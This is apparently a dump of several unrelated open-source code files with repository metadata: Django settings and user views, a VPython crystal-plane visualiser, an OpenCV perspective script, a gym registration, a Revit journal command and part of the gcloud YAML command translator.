https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.sites",
"healthcare",
]
LOCAL_APPS = [
"home",
"users.apps.UsersConfig",
]
THIRD_PARTY_APPS = [
"rest_framework",
"rest_framework.authtoken",
"rest_auth",
"rest_auth.registration",
"bootstrap4",
"allauth",
"allauth.account",
"allauth.socialaccount",
"allauth.socialaccount.providers.google",
"django_extensions",
"drf_yasg",
"storages",
# start fcm_django push notifications
"fcm_django",
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "smart_odberne_miest_23193.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "smart_odberne_miest_23193.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {"default": env.db()}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
MIDDLEWARE += ["whitenoise.middleware.WhiteNoiseMiddleware"]
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID
and AWS_SECRET_ACCESS_KEY
and AWS_STORAGE_BUCKET_NAME
and AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = "/mediafiles/"
MEDIA_ROOT = os.path.join(BASE_DIR, "mediafiles")
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning(
"You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails."
)
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
fa73eb76aa270675a2adadf1b640c4548ac27b05
|
03e455add23431487a88bc8a0965aee0cb535171
|
/cubicplane.py
|
13958913423e0337f74e91553b30ba22a85b72d0
|
[] |
no_license
|
animator/Crystosim_Techkriti
|
c20193b098d236b9ce3823c41b57d3bd2592c874
|
3f154b02541eb80f5d0631534c3c2daca78116ce
|
refs/heads/master
| 2021-01-18T07:40:22.594062
| 2012-01-28T10:12:38
| 2012-01-28T10:12:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,297
|
py
|
from visual import *
def drawborder(list1,list2,list3):
l=paths.line(start=list1,end=list2)
curve(pos=l.pos,color=color.yellow)
l1=paths.line(start=list2,end=list3)
curve(pos=l1.pos,color=color.yellow)
l2=paths.line(start=list3,end=list1)
curve(pos=l2.pos,color=color.yellow)
def drawborder1(list1,list2,list3,list4):
l=paths.line(start=list1,end=list2)
curve(pos=l.pos,color=color.yellow)
l1=paths.line(start=list2,end=list3)
curve(pos=l1.pos,color=color.yellow)
l2=paths.line(start=list3,end=list4)
curve(pos=l2.pos,color=color.yellow)
l3=paths.line(start=list4,end=list1)
curve(pos=l3.pos,color=color.yellow)
def drawline(list1,list2):
l=paths.line(start=list1,end=list2,np=2)
curve(pos=l.pos)
return
def sc(x,y,z,l,w,h,a,b,c):
if x==l and y==w and z==h:
return
if x<l and y<w and z<h:
drawline([x,y,z],[x+a,y,z])
drawline([x,y,z],[x,y+b,z])
drawline([x,y,z],[x,y,z+c])
if x==l and y==w :
drawline([x,y,z],[x,y,z+c])
return
if x==l and z==h:
drawline([x,y,z],[x,y+b,z])
return
if y==w and z==h:
drawline([x,y,z],[x+a,y,z])
return
if x==l:
drawline([x,y,z],[x,y+b,z])
drawline([x,y,z],[x,y,z+c])
if y==w:
drawline([x,y,z],[x+a,y,z])
drawline([x,y,z],[x,y,z+c])
if z==h:
drawline([x,y,z],[x+a,y,z])
drawline([x,y,z],[x,y+b,z])
return
def hcf(a,b):
if(a<b):
x=a
a=b
b=x
if(a%b ==0):
return b
while(a>b and a%b!=0):
r=a%b
b=a
a=r
return r
def main(a,b,c,h,k,l1):
list=[[0,0,0]]
for x in range(0,2*a,a):
for y in range(0,2*b,b):
for z in range(0,2*c,c):
sc(x,y,z,a,b,c,a,b,c)
# s=sphere(pos=(x,y,z),radius=p*r)
line1=paths.line(start=(0,0,0),end=(2*a,0,0),np=2)
curve(pos=line1.pos,color=color.blue)
line1=paths.line(start=(0,0,0),end=(0,2*b,0),np=2)
curve(pos=line1.pos,color=color.red)
line1=paths.line(start=(0,0,0),end=(0,0,2*c),np=2)
curve(pos=line1.pos,color=color.cyan)
if (h==0 and k==0):
faces(pos=[(0,0,0),(0,0,c),(a,0,c)],color=color.cyan)
faces(pos=[(a,0,c),(0,0,c),(0,0,0)],color=color.cyan)
faces(pos=[(0,0,0),(a,0,0),(a,0,c)],color=color.cyan)
faces(pos=[(a,0,c),(a,0,0),(0,0,0)],color=color.cyan)
drawborder1([0,0,0],[0,0,c],[a,0,c],[a,0,0])
return
if (k==0 and l1==0):
faces(pos=[(0,0,0),(0,b,0),(a,b,0)],color=color.cyan)
faces(pos=[(a,b,0),(0,b,0),(0,0,0)],color=color.cyan)
faces(pos=[(0,0,0),(a,0,0),(a,b,0)],color=color.cyan)
faces(pos=[(a,b,0),(a,0,0),(0,0,0)],color=color.cyan)
drawborder1([0,0,0],[a,0,0],[a,b,0],[0,b,0])
return
if (h==0 and l1==0):
faces(pos=[(0,0,0),(0,0,c),(0,b,c)],color=color.cyan)
faces(pos=[(0,b,c),(0,0,c),(0,0,0)],color=color.cyan)
faces(pos=[(0,0,0),(0,b,0),(0,b,c)],color=color.cyan)
faces(pos=[(0,b,c),(0,b,0),(0,0,0)],color=color.cyan)
drawborder1([0,0,0],[0,b,0],[0,b,c],[0,0,c])
return
if (h==0):
m=hcf(abs(k),abs(l1))
k=k*1.0/m
l1=l1*1.0/m
#k=k*1.0/m
#l1=l1*1.0/m
k=b*1.0/k
l1=c*1.0/l1
faces(pos=[(0,k,0),(a,k,0),(a,0,l1)],color=color.cyan)
faces(pos=[(a,0,l1),(a,k,0),(0,k,0)],color=color.cyan)
faces(pos=[(0,k,0),(0,0,l1),(a,0,l1)],color=color.cyan)
faces(pos=[(a,0,l1),(0,0,l1),(0,k,0)],color=color.cyan)
drawborder1([0,0,l1],[0,k,0],[a,k,0],[a,0,l1])
return
if (k==0):
m=hcf(abs(h),abs(l1))
h=h*1.0/m
l1=l1*1.0/m
# h=1.0/h
# l1=1.0/l1
h=a*1.0/h
l1=c*1.0/l1
faces(pos=[(h,0,0),(h,b,0),(0,b,l1)],color=color.cyan)
faces(pos=[(0,b,l1),(h,b,0),(h,0,0)],color=color.cyan)
faces(pos=[(h,0,0),(0,0,l1),(0,b,l1)],color=color.cyan)
faces(pos=[(0,b,l1),(0,0,l1),(h,0,0)],color=color.cyan)
drawborder1([h,0,0],[0,0,l1],[0,b,l1],[h,b,0])
#drawborder([h,0,0],[0,b,0],[h,0,l1])
return
if (l1==0):
m=hcf(abs(h),abs(k))
h=h*1.0/m
k=k*1.0/m
h=a*1.0/h
k=b*1.0/k
faces(pos=[(h,0,0),(0,k,0),(0,k,c)],color=color.cyan)
faces(pos=[(0,k,c),(0,k,0),(h,0,0)],color=color.cyan)
faces(pos=[(0,k,c),(h,0,c),(h,0,0)],color=color.cyan)
faces(pos=[(h,0,0),(h,0,c),(0,k,c)],color=color.cyan)
drawborder1([h,0,0],[0,k,0],[0,k,c],[h,0,c])
#drawborder([h,0,c],[0,0,c],[h,k,0])
return
#print m
m1=hcf(abs(h),abs(k))
m2=hcf(abs(k),abs(l1))
m=hcf(abs(m1),abs(m2))
# m=min(m1,m2,m3)
h=h*1.0/m
k=k*1.0/m
l1=l1*1.0/m
h=a*1.0/h
k=b*1.0/k
l1=c*1.0/l1
faces(pos=[(h,0,0),(0,k,0),(0,0,l1)],color=color.cyan)
faces(pos=[(0,0,l1),(0,k,0),(h,0,0)],color=color.cyan)
drawborder([h,0,0],[0,k,0],[0,0,l1])
return
#main(1,1,1,2,3,0)
|
[
"ashita92@rediffmail.com"
] |
ashita92@rediffmail.com
|
810d5b88dd8110a1cbec9f2d913ef8cf91aaeebe
|
1d2bbeda56f8fede69cd9ebde6f5f2b8a50d4a41
|
/medium/python3/c0258_525_contiguous-array/00_leetcode_0258.py
|
0cbadf559161562e4c1aba24f1de80d4ed841781
|
[] |
no_license
|
drunkwater/leetcode
|
38b8e477eade68250d0bc8b2317542aa62431e03
|
8cc4a07763e71efbaedb523015f0c1eff2927f60
|
refs/heads/master
| 2020-04-06T07:09:43.798498
| 2018-06-20T02:06:40
| 2018-06-20T02:06:40
| 127,843,545
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 766
|
py
|
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#525. Contiguous Array
#Given a binary array, find the maximum length of a contiguous subarray with equal number of 0 and 1.
#Example 1:
#Input: [0,1]
#Output: 2
#Explanation: [0, 1] is the longest contiguous subarray with equal number of 0 and 1.
#Example 2:
#Input: [0,1,0]
#Output: 2
#Explanation: [0, 1] (or [1, 0]) is a longest contiguous subarray with equal number of 0 and 1.
#Note: The length of the given binary array will not exceed 50,000.
#class Solution:
# def findMaxLength(self, nums):
# """
# :type nums: List[int]
# :rtype: int
# """
# Time Is Money
|
[
"Church.Zhong@audiocodes.com"
] |
Church.Zhong@audiocodes.com
|
62c93e17f98983d6cb6ea5d285442b221d590658
|
561accc0e4997f906134fed6c95ef60f17ae5f72
|
/drive_car/__init__.py
|
29fde3052f99244a8d7432b842fc0e369f411fcf
|
[] |
no_license
|
RRRK-Malla/my_gym_env
|
73d30668b66dce0d488b2d71616e130e72849786
|
e7a683c5ac733e071298e6663f6799def5602901
|
refs/heads/main
| 2023-05-10T18:29:29.817109
| 2021-06-02T12:12:16
| 2021-06-02T12:12:16
| 372,929,654
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 121
|
py
|
from gym.envs.registration import register
register(
id='Drivezy-v0',
entry_point='my_gym_env.envs:DriveEnv',
)
|
[
"noreply@github.com"
] |
RRRK-Malla.noreply@github.com
|
2b863af19654c99e670c201cd7b45dc9fe4d57f7
|
e87dd89621f163902a7c8c0a318f9b7af71182d8
|
/CV_proj3/AXL1800151.py
|
663c4034556b3e779ccab8d607a6f4cc0956a732
|
[] |
no_license
|
shadowjljp/Computer_Viision-master
|
d2d375d903954339d73d1091cb547ce4e140ea83
|
9534bb686fc736a2af33f2691821dfdc3e037cbc
|
refs/heads/master
| 2022-11-24T10:54:37.820923
| 2020-07-25T20:42:33
| 2020-07-25T20:42:33
| 282,521,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
import math
import cv2
import numpy as np
import sys
# read arguments
from cv2.cv2 import cvtColor
if (len(sys.argv) != 8):
print(sys.argv[0], ": takes 7 arguments. Not ", len(sys.argv) - 1)
print("Example:", sys.argv[0], "fruits.jpg 0 0.001 1 1 0 0 ")
sys.exit()
name_input = sys.argv[1]
f = float(sys.argv[2])
u0 = float(sys.argv[3])
v0 = float(sys.argv[4])
a = float(sys.argv[5])
b = float(sys.argv[6])
c = float(sys.argv[7])
inputImage = cv2.imread(name_input, cv2.IMREAD_COLOR)
# M=np.zeros([3,3],dtype=np.uint8)
# M[2]=c(u-u0)
rows, cols, band = inputImage.shape
def perspectiveTransform():
# pts1 = np.float32([[rows * 0.25, cols * 0.25], [rows * 0.75, cols * 0.25], [rows * 0.25, cols * 0.75],
# [rows * 0.75, cols * 0.75]])
pts1 = np.float32([[0, 0], [100, 0], [100, 100], [0, 100]])
X0 = []
Y0 = []
for i in range(4):
X0.append((c * (pts1[i][0] - u0)) / (f - a * (pts1[i][0] - u0) - b * (pts1[i][1] - v0)))
Y0.append((c * (pts1[i][1]) - v0) / (f - a * (pts1[i][0] - u0) - b * (pts1[i][1] - v0)))
# print(X0)
pts2 = np.float32([[X0[0], Y0[0]], [X0[1], Y0[1]], [X0[2], Y0[2]], [X0[3], Y0[3]]])
M = cv2.getPerspectiveTransform(pts1, pts2)
print('M= ', M)
return M
M = perspectiveTransform()
inputImage = cv2.warpPerspective(inputImage, M, (inputImage.shape[1], inputImage.shape[0]))
cv2.imshow("Perspective projection", inputImage)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"40411574+shadowjljp@users.noreply.github.com"
] |
40411574+shadowjljp@users.noreply.github.com
|
5d7790dc0aedd550553acaf377d461a7dbaec9a1
|
19712eead5dd2ca4d7616d401a53dc1a192ab258
|
/commands/warnings/__init__.py
|
bf4ca626085af98394f063d57d7a4e0a718f3249
|
[
"MIT"
] |
permissive
|
sunjini/rvt_model_services
|
8bf18e8b26372daac996622feb5e99f1a55d1a93
|
f95d89a7a5696276e1ef22924e6981f083ffa7bc
|
refs/heads/master
| 2020-09-17T12:40:17.077677
| 2019-06-24T06:25:47
| 2019-06-24T06:25:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
import rjm
import os
import os.path as op
from . import bokeh_warnings_graphs
def cmd_journal(project_code, model_path, jrn_path, com_dir, log_dir):
warnings_dir = op.join(op.dirname(com_dir), "warnings" + os.sep)
rvt_jrn = rjm.JournalMaker()
rvt_jrn.open_workshared_model(model_path=model_path, detached=True, audit=True)
rvt_jrn.add_custom_entry(override_jrn_command.format(warnings_dir, project_code))
rvt_jrn.close_model()
rvt_jrn.write_journal(jrn_path)
override_jrn_command = """ Jrn.RibbonEvent "TabActivated:Manage"
Jrn.Command "Ribbon" , "Review previously posted warnings , ID_REVIEW_WARNINGS"
Jrn.Data "Error dialog" , "0 failures, 0 errors, 0 warnings"
Jrn.PushButton "Modeless , Autodesk Revit Architecture 2016 , Dialog_Revit_ReviewWarningsDialog" _
, "Export..., Control_Revit_ExportErrorReport"
Jrn.Data "Error Report Action" , "IDOK"
Jrn.Data "Error Report File Path" , "{0}"
Jrn.Data "Error Report File Name" , "{1}"
Jrn.Data "Error Report File Format" , "html"
Jrn.PushButton "Modeless , Autodesk Revit Architecture 2016 , Dialog_Revit_ReviewWarningsDialog" , "Close, IDABORT"
"""
register = {"name": "warnings",
"rjm": cmd_journal,
"optional_html_path": True,
"post_process": {"func": bokeh_warnings_graphs.update_json_and_bokeh,
"args": ["project_code", "html_path", "warn_ids_path"]},
}
|
[
"dt12345/"
] |
dt12345/
|
bfc99b6aaa87e38884ff8ecff55930f0c7a1bcef
|
494d020f266ed4dc063264914d24d96bf2b69dc8
|
/build/lib/modules/users/views_api.py
|
92e72d8580d9f34822fb783aa649d000904efb77
|
[] |
no_license
|
diy01/flerken_two
|
2914260f3881fedeecdc075ad4e5e746f6bbed01
|
e2b97e284da9e203dafb5ac62658f2435fd95d55
|
refs/heads/master
| 2020-05-25T11:20:59.767825
| 2019-05-05T09:06:01
| 2019-05-21T06:04:24
| 187,778,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,188
|
py
|
from django.contrib import auth
from django.contrib.auth.models import User
from django.db import transaction
from django_filters.rest_framework.backends import DjangoFilterBackend
from rest_framework import filters
from rest_framework import parsers, renderers
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.response import Response
from rest_framework.views import APIView
from modules.users.serializers import UserSerializer
from utils.base import BaseListCreateAPIView, content
from utils.base_exception import APIValidateException
class UserToken(APIView):
throttle_classes = ()
permission_classes = ()
parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = AuthTokenSerializer
def get(self, request, *args, **kwargs):
if not request.user.username:
return Response({'detail': u'用户未认证'}, status.HTTP_401_UNAUTHORIZED)
token, created = Token.objects.get_or_create(user=request.user)
return Response({'token': token.key})
class UpdateUserToken(APIView):
throttle_classes = ()
permission_classes = ()
parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = AuthTokenSerializer
@transaction.atomic()
@content
def post(self, request, *args, **kwargs):
if not request.user.username:
return Response({'detail': u'用户未认证'}, status.HTTP_401_UNAUTHORIZED)
Token.objects.filter(user_id=request.user.id).delete()
token, created = Token.objects.get_or_create(user=request.user)
return Response({'token': token.key})
class ChangeUserPwd(BaseListCreateAPIView):
"""
用户修改密码.
输入参数:
* old_password —— 旧密码(必输)
* password —— 新密码(必输)
"""
paginate_by = None
queryset = User.objects.all()
filter_backends = (DjangoFilterBackend, filters.SearchFilter,)
serializer_class = UserSerializer
def get(self, request, *args, **kwargs):
raise APIValidateException(u'不允许get操作', status_code=status.HTTP_405_METHOD_NOT_ALLOWED)
def _allowed_methods(self):
return ['PATCH', 'HEAD', 'OPTIONS']
@transaction.atomic()
@content
def patch(self, request, *args, **kwargs):
data = {'success': True, 'msg': u'新增成功'}
username = request.user.username
password = request.data.get('password')
old_password = request.data.get('old_password')
if not password:
raise APIValidateException(u'password 不能为空')
user = auth.authenticate(username=username, password=old_password)
if not user:
raise APIValidateException(u'旧密码不正确')
user.set_password(password)
user.save()
self.changeLog(user.id, user.username, u'修改密码')
return Response(data)
|
[
"810625951@qq.com"
] |
810625951@qq.com
|
4b1878e479a9fc19e774caab707557cf99dfb680
|
d98883fe1007111b8795ac5661e56758eca3b62e
|
/google-cloud-sdk/lib/googlecloudsdk/command_lib/util/apis/yaml_command_translator.py
|
39f73cc678f03999817c4b609c29aaea7f039637
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
pyDeb/KindnessCafe
|
7303464e3c0693b0586a4a32740d8b9b19299caf
|
6ff8dfe338aefd986edf67c382aff1a2920945d1
|
refs/heads/master
| 2022-12-29T16:16:35.796387
| 2021-04-19T00:03:14
| 2021-04-19T00:03:14
| 243,533,146
| 3
| 4
| null | 2022-12-08T09:48:09
| 2020-02-27T14:01:16
|
Python
|
UTF-8
|
Python
| false
| false
| 45,199
|
py
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A yaml to calliope command translator.
Calliope allows you to register a hook that converts a yaml command spec into
a calliope command class. The Translator class in this module implements that
interface and provides generators for a yaml command spec. The schema for the
spec can be found in yaml_command_schema.yaml.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import json
from apitools.base.protorpclite import messages as apitools_messages
from apitools.base.py import encoding
from apitools.base.py.exceptions import HttpBadRequestError
from googlecloudsdk.api_lib.util import waiter
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import command_loading
from googlecloudsdk.command_lib.iam import iam_util
from googlecloudsdk.command_lib.util import completers
from googlecloudsdk.command_lib.util.apis import arg_marshalling
from googlecloudsdk.command_lib.util.apis import arg_utils
from googlecloudsdk.command_lib.util.apis import registry
from googlecloudsdk.command_lib.util.apis import update
from googlecloudsdk.command_lib.util.apis import yaml_command_schema
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import resources
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.resource import resource_transform
import six
class Translator(command_loading.YamlCommandTranslator):
"""Class that implements the calliope translator interface."""
def Translate(self, path, command_data):
spec = yaml_command_schema.CommandData(path[-1], command_data)
c = CommandBuilder(spec, path)
return c.Generate()
class DeclarativeIamRolesCompleter(completers.ListCommandCompleter):
"""An IAM role completer for a resource argument.
The Complete() method override bypasses the completion cache.
Attributes:
_get_resource_ref: DeclarativeArgumentGenerator.GetRequestResourceRef method
to parse the resource ref.
"""
def __init__(self, get_resource_ref, **kwargs):
super(DeclarativeIamRolesCompleter, self).__init__(**kwargs)
self._get_resource_ref = get_resource_ref
def GetListCommand(self, parameter_info):
resource_ref = self._get_resource_ref(parameter_info.parsed_args)
resource_uri = resource_ref.SelfLink()
return [
'iam', 'list-grantable-roles', '--quiet', '--flatten=name',
'--format=disable', resource_uri
]
def Complete(self, prefix, parameter_info):
"""Bypasses the cache and returns completions matching prefix."""
command = self.GetListCommand(parameter_info)
items = self.GetAllItems(command, parameter_info)
return [
item for item in items or []
if item is not None and item.startswith(prefix)
]
class CommandBuilder(object):
"""Generates calliope commands based on the yaml spec."""
IGNORED_FLAGS = {'project'}
def __init__(self, spec, path):
self.spec = spec
self.path = path
self.method = registry.GetMethod(
self.spec.request.collection, self.spec.request.method,
self.spec.request.api_version)
resource_arg = self.spec.arguments.resource
self.arg_generator = arg_marshalling.DeclarativeArgumentGenerator(
self.method,
self.spec.arguments.params,
resource_arg)
self.display_resource_type = self.spec.request.display_resource_type
if (not self.display_resource_type
and resource_arg and not resource_arg.is_parent_resource):
self.display_resource_type = resource_arg.name if resource_arg else None
def Generate(self):
"""Generates a calliope command from the yaml spec.
Raises:
ValueError: If we don't know how to generate the given command type (this
is not actually possible right now due to the enum).
Returns:
calliope.base.Command, The command that implements the spec.
"""
if self.spec.command_type == yaml_command_schema.CommandType.DESCRIBE:
command = self._GenerateDescribeCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.LIST:
command = self._GenerateListCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.DELETE:
command = self._GenerateDeleteCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.CREATE:
command = self._GenerateCreateCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.WAIT:
command = self._GenerateWaitCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.GET_IAM_POLICY):
command = self._GenerateGetIamPolicyCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.SET_IAM_POLICY):
command = self._GenerateSetIamPolicyCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.ADD_IAM_POLICY_BINDING):
command = self._GenerateAddIamPolicyBindingCommand()
elif (self.spec.command_type ==
yaml_command_schema.CommandType.REMOVE_IAM_POLICY_BINDING):
command = self._GenerateRemoveIamPolicyBindingCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.UPDATE:
command = self._GenerateUpdateCommand()
elif self.spec.command_type == yaml_command_schema.CommandType.GENERIC:
command = self._GenerateGenericCommand()
else:
raise ValueError('Command [{}] unknown command type [{}].'.format(
' '.join(self.path), self.spec.command_type))
self._ConfigureGlobalAttributes(command)
return command
def _GenerateDescribeCommand(self):
"""Generates a Describe command.
A describe command has a single resource argument and an API method to call
to get the resource. The result is returned using the default output format.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.DescribeCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
def Run(self_, args):
unused_ref, response = self._CommonRun(args)
return self._HandleResponse(response, args)
return Command
def _GenerateListCommand(self):
"""Generates a List command.
A list command operates on a single resource and has flags for the parent
collection of that resource. Because it extends the calliope base List
command, it gets flags for things like limit, filter, and page size. A
list command should register a table output format to display the result.
If arguments.resource.response_id_field is specified, a --uri flag will also
be enabled.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.ListCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
# Remove the URI flag if we don't know how to generate URIs for this
# resource.
if not self.spec.response.id_field:
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
self._RegisterURIFunc(args)
unused_ref, response = self._CommonRun(args)
return self._HandleResponse(response, args)
return Command
def _GenerateDeleteCommand(self):
"""Generates a Delete command.
A delete command has a single resource argument and an API to call to
perform the delete. If the async section is given in the spec, an --async
flag is added and polling is automatically done on the response. For APIs
that adhere to standards, no further configuration is necessary. If the API
uses custom operations, you may need to provide extra configuration to
describe how to poll the operation.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.DeleteCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
